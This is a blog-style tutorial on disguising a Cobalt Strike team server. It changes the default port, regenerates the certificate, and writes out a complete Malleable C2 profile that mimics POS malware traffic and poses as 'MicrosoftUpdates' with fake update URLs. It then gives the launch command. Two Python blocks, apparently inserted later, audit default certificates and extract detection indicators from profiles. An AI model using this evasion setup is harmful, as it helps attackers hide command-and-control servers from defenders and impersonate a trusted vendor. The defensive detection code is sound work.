Hiding skills of CobaltStrike server

Keywords: Windows security

Contents

Introduction
1. Modify the default port
2. Replace the SSL certificate
3. Modify the C2.profile file
   Create and modify the C2 profile file
4. Run the teamserver and go online


Introduction

Many tools carry recognisable fingerprints. Scanners such as sqlmap and AWVS are easily blocked by a WAF when they scan, and a C2 server that does not hide its own fingerprints is exposed as soon as it goes online.

Here we hide those fingerprints in three ways: modifying the default port, replacing the SSL certificate, and modifying the C2.profile file.

Cobalt Strike 4.0 is used here.

1. Modify the default port

vim teamserver

The default port, 50050, is set on the last line of the file; change it to any other port as the situation requires.

I changed it here to 10000

2. Replace the SSL certificate

keytool is the Java certificate and key management tool.

keytool stores keys and certificates in a file called a keystore; here that is the file with the .store suffix.

Common keytool commands:

 - certreq             Generate certificate request
 - changealias         Change the alias of an entry
 - delete              Delete entry
 - exportcert          Export certificate
 - genkeypair          Generate key pair
 - genseckey           Generate key
 - gencert             Generate certificate based on certificate request
 - importcert          Import certificate or certificate chain
 - importpass          Import password
 - importkeystore      Import one or all entries from another keystore
 - keypasswd           Change key password for entry
 - list                List entries in the keystore
 - printcert           Print certificate content
 - printcertreq        Print the contents of the certificate request
 - printcrl            Print the contents of the CRL file
 - storepasswd         Change the password stored in the keystore

View Certificate:

keytool -list -v -keystore cobaltstrike.store

The default keystore password is 123456.

The alias and the certificate owner both contain Cobalt Strike fingerprints.

The default is:

CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth

To change this, generate a new keystore with a fresh certificate:

keytool -genkey -alias ling -keyalg RSA -validity 36500 -keystore ling.store

View Certificate:

keytool -list -v -keystore ling.store

Convert the keystore to PKCS12 format (the command imports the keystore into itself with the new store type):

keytool -importkeystore -srckeystore ./ling.store -destkeystore ./ling.store -deststoretype pkcs12
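The two fingerprints covered so far, the default management port and the default certificate subject, are exactly what a defender looks for when reviewing a suspected team server. The check below is an added example and not part of the original post: it parses the subject line that keytool -list -v (Owner: ...) or openssl x509 -noout -subject prints, reports which default Cobalt Strike subject fields are still present, and flags the default port 50050. The sample subject lines are constructed.

```python
"""Defender-side audit of Cobalt Strike team server defaults (added example).

parse_dn() reads a subject line as printed by `keytool -list -v` ("Owner: ...")
or `openssl x509 -noout -subject` ("subject=..."), audit_teamserver() reports
which default fingerprints remain. The sample lines at the bottom are constructed.
"""
import re

# Default certificate subject shipped with Cobalt Strike (as shown in the post).
CS_DEFAULT_DN = {
    "CN": "Major Cobalt Strike",
    "OU": "AdvancedPenTesting",
    "O": "cobaltstrike",
    "L": "Somewhere",
    "ST": "Cyberspace",
    "C": "Earth",
}
CS_DEFAULT_PORT = 50050


def parse_dn(line):
    """Parse 'Owner: CN=x, OU=y' / 'subject=CN = x, O = y' / a bare DN into
    a dict of attribute -> value. Commas inside double-quoted values are kept."""
    text = line.strip()
    text = re.sub(r"^(Owner|Issuer|subject|issuer)\s*[:=]\s*", "", text, flags=re.I)
    # Split on commas that are not inside a double-quoted value.
    parts = re.split(r',\s*(?=(?:[^"]*"[^"]*")*[^"]*$)', text)
    dn = {}
    for part in parts:
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        dn[key.strip().upper()] = value.strip().strip('"')
    return dn


def default_cert_fields(dn):
    """Return the subject attributes that still hold Cobalt Strike's default values."""
    return sorted(k for k, v in CS_DEFAULT_DN.items()
                  if dn.get(k, "").lower() == v.lower())


def audit_teamserver(port, subject_line):
    """Collect findings for one team server: default port and default cert fields."""
    findings = []
    if port == CS_DEFAULT_PORT:
        findings.append("management port is the default 50050")
    hits = default_cert_fields(parse_dn(subject_line))
    if hits:
        findings.append("certificate keeps default fields: " + ", ".join(hits))
    return findings


# Constructed sample lines in the formats keytool and openssl print.
DEFAULT_KEYTOOL_LINE = ("Owner: CN=Major Cobalt Strike, OU=AdvancedPenTesting, "
                        "O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth")
REPLACED_OPENSSL_LINE = "subject=CN = update.example.test, O = Example Corp, C = US"

if __name__ == "__main__":
    for port, line in [(50050, DEFAULT_KEYTOOL_LINE), (10000, REPLACED_OPENSSL_LINE)]:
        print(port, audit_teamserver(port, line) or ["no default fingerprints"])
```

A partially edited certificate (for example only CN changed) still trips the check on the remaining fields, which is why the post regenerates the whole keystore rather than editing one attribute.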

3. Modify the C2.profile file

Create and modify C2 profile file:

vi c2.profile

# The file name is arbitrary
set sample_name "C2 POS Malware";
set sleeptime "5000";    # 5000 ms (5 s) between callbacks
set jitter "10";         # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";

# Certificate settings
https-certificate {
    set CN "US";
    set O "MicrosoftUpdates";
    set C "en";
    set L "US";
    set OU "MicrosoftUpdates";
    set ST "US";
    set validity "365";
}

# Code-signing keystore generated above
code-signer {
    set keystore "ling.store";
    set password "159357";
    set alias "ling";
}

# IP address returned to the DNS Beacon when it has no tasks (idle)
set dns_idle "8.8.4.4";
# Forced sleep time before each individual DNS request
set dns_sleep "0";
# Maximum length of a host name when uploading data through DNS [0-255]
set maxdns "235";

http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urlencoded";
        id {
            netbios;
            parameter "id";
        }
        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }
    server {
        output {
            print;
        }
    }
}

http-get {
    set uri "/updates";
    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }
    server {
        header "Content-Type" "text/plain";
        output {
            base64;
            print;
        }
    }
}

Use c2lint to check that the profile parses:

./c2lint c2.profile

If the check fails, c2lint prints the error in red.
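Everything a profile like the one above changes on the wire (URIs, User-Agent, fixed request headers, sleep and jitter) is also what a detection engineer extracts from a recovered profile to write rules. The parser below is an added example, not the post's code and not Cobalt Strike's c2lint; it handles the subset of the Malleable C2 grammar used in this post (set/header/prepend statements ending in ";" and named { } blocks) and returns those values as a dict. SAMPLE_PROFILE is a constructed excerpt of the profile shown above; the assumption that jitter shortens the sleep (so the check-in interval lies between sleep*(1-jitter) and sleep) is the Cobalt Strike behaviour as documented.

```python
"""Parse a Malleable C2 profile and pull out network indicators (added example).

tokenize() splits the profile into strings, symbols and words (comments dropped),
parse() builds a tree of {'set', 'stmts', 'blocks'}, and indicators() returns
the values a detection rule would key on. SAMPLE_PROFILE is a constructed excerpt.
"""
import re

SAMPLE_PROFILE = '''
set sample_name "C2 POS Malware";
set sleeptime "5000";   # 5000 ms between callbacks
set jitter "10";
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php";
    client {
        header "Accept" "text/plain";
        header "Content-Type" "application/x-www-form-urlencoded";
        id { netbios; parameter "id"; }
        output { base64; prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data="; print; }
    }
    server { output { print; } }
}
http-get {
    set uri "/updates";
    client { metadata { netbiosu; prepend "user="; header "Cookie"; } }
    server { header "Content-Type" "text/plain"; output { base64; print; } }
}
'''

# Order matters: a quoted string is tried before the comment and word rules,
# so '#' or ';' inside a string never ends a statement.
TOKEN_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|(#[^\n]*)|([{};])|([^\s{};"]+)')


def tokenize(text):
    """Yield (kind, value) tokens with kind in {'str', 'sym', 'word'}."""
    for m in TOKEN_RE.finditer(text):
        string, comment, sym, word = m.groups()
        if comment is not None:
            continue
        if string is not None:
            yield "str", string
        elif sym is not None:
            yield "sym", sym
        else:
            yield "word", word


def parse(tokens):
    """Recursive-descent parse into {'set': {...}, 'stmts': [...], 'blocks': {...}}.
    A repeated block name (several http-get variants) keeps the last one."""
    tokens = list(tokens)
    pos = 0

    def block():
        nonlocal pos
        node = {"set": {}, "stmts": [], "blocks": {}}
        while pos < len(tokens) and tokens[pos] != ("sym", "}"):
            _, name = tokens[pos]
            pos += 1
            args = []
            while pos < len(tokens) and tokens[pos][0] != "sym":
                args.append(tokens[pos][1])
                pos += 1
            if pos >= len(tokens):
                raise ValueError("unexpected end of profile after %r" % name)
            sym = tokens[pos][1]
            pos += 1
            if sym == "{":
                node["blocks"][name] = block()
                pos += 1                      # consume the closing brace
            elif name == "set" and len(args) == 2:
                node["set"][args[0]] = args[1]
            else:
                node["stmts"].append((name, args))
        return node

    return block()


def indicators(text):
    """Return detection-relevant values from a profile as a plain dict."""
    tree = parse(tokenize(text))
    top = tree["set"]
    out = {
        "user_agent": top.get("useragent"),
        "sleep_ms": int(top.get("sleeptime", "60000")),
        "jitter_pct": int(top.get("jitter", "0")),
        "get_uris": [], "post_uris": [], "headers": {},
    }
    for kind in ("http-get", "http-post"):
        blk = tree["blocks"].get(kind)
        if not blk:
            continue
        out[kind.split("-")[1] + "_uris"] = blk["set"].get("uri", "").split()
        client = blk["blocks"].get("client", {"stmts": []})
        for name, args in client["stmts"]:
            if name == "header" and len(args) == 2:   # fixed client headers
                out["headers"].setdefault(args[0], []).append(args[1])
    out["headers"] = {k: sorted(v) for k, v in out["headers"].items()}
    # Jitter shortens the sleep, so this is the shortest expected check-in gap.
    out["min_interval_ms"] = out["sleep_ms"] * (100 - out["jitter_pct"]) // 100
    return out


if __name__ == "__main__":
    for key, value in indicators(SAMPLE_PROFILE).items():
        print(key, "=", value)
```

Note that only headers set directly in the client block are collected; the "Cookie" header in the http-get metadata block is a transform target, not a fixed header, so it is deliberately left out.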

4. Run the teamserver and go online

./teamserver 192.168.100.142 123123 ling.store

The team server starts and the client connects successfully.

Posted by shaitan on Wed, 17 Nov 2021 20:52:28 -0800